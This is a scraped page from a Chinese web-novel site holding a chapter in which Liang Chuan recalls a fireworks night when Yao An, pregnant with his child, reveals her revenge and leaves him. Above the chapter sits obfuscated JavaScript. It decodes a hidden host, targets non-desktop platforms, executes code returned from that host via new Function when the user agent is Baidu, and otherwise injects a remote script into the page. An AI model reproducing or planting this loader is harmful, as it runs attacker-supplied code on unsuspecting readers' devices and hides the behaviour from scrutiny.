98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

梁川番外(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

我以为一切都会好,昨天她还要我给她买烟花放。

这有什么难的,时过境迁,我再也不是那个走投无路的少年了,只是一场烟花,未免有些简单了。

夜晚来的好慢,姚安有些着急,说她特别期待。

那时我听不明白她的意味深长,还叫她坐下来歇歇,说黑夜永远永远都不会迟到。

当然,它也确实是如期而至,叫我永生难忘。

烟花好漂亮,怪不得她喜欢,趴在窗前心满意足的看,也给我鼓掌,夸我好棒。

就像是寻常夫妻一样,我们做许多浪漫又无意义的小事,不知疲倦的在生活里制造惊喜。

也让我忘记,我们之间是搀夹着数不清的是非和眼泪的,还有长达数十年的恩怨情仇。

数不清更忘不掉。

烟花声好吵,她把电话打给我,如果有后悔药吃的话,我一定不会选择把它接起,可人生最妙的地方就在于没有回头路,就比如过往中姚安苦不堪言的五年,像一条长长的河,把我们二人给相隔开。

我承认,是我愚蠢,我把一切都搞砸了。

我留不住任何人。

我是失败的梁川。

姚安远比我想象中更恨,她是那样畅意的点燃一根烟,几个字、一句话,她漫不经心的,举起讨伐的十字架。

这个夜晚逐渐变得狰狞,最后一瞬的花火落下,我看到她的模样,开怀怨毒,散漫慵懒。

这是我记忆里的姚安,好多年前、最一开始的时候她就是这样,一口血沫吐出来,说不会放过你。

劝你杀了我,不然后悔的就是你。

到时候,别怪我没跟你说过。

那时只觉得好笑,软趴趴的小姑娘,被人打到头都抬不起来,怎么敢说这样的话,未免有些太狂傲。

今天我才知道,她没骗人,没机会就算了,可但凡有机会,是真的会咬死我,生生世世忘不掉。

不愧是姚安,我小瞧她了。

且杀人诛心,一击毙命,她把一切都经营的漂亮,早些日子我只会说可惜,可时至今日,我再也没有办法这样。

她勾勒出一个那么好的生活给我,要我日日期待,摩拳擦掌的迎接。

偏偏,又要当着我的面亲手打破。

真有本事,她连当年的事情都知道,钢笔的盒子丢下来,像有一把无名大火在我心里燃烧起来。

许多年前的滋味又被我记起,我发了疯似的把它踩碎,怒发冲冠的说了许多许多!

也不由自主的感叹,姚安这一仗赢得格外漂亮,虎父无犬子,她不亏是姚佰承的女儿。

我要冲进去狠狠地教训她!

这个该死的女人!

她把我的真心当成了什么!可姚安只是笑起来,她摸了摸隆起的小腹,问我期待吗。

“这是你的孩子,你还给她取了名字。”

“叫什么来着?”

“对!叫梁亿白,算命先生给起的。”

然后她说算命先生不准,要是真得厉害,就一定能算得出来,今夜之后,我们再也不会相见。

我们再也不会相见

“你要离我而去了吗?”

呢喃着,我问一句,也只是顷刻之间,我所有的理智都被瓦解下来,像个没人要的可怜孩子,对着夜空一声又一声的质问:“你想做什么!”

“或者说你想我做什么!!!”

“昨天不还好好地!!!”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间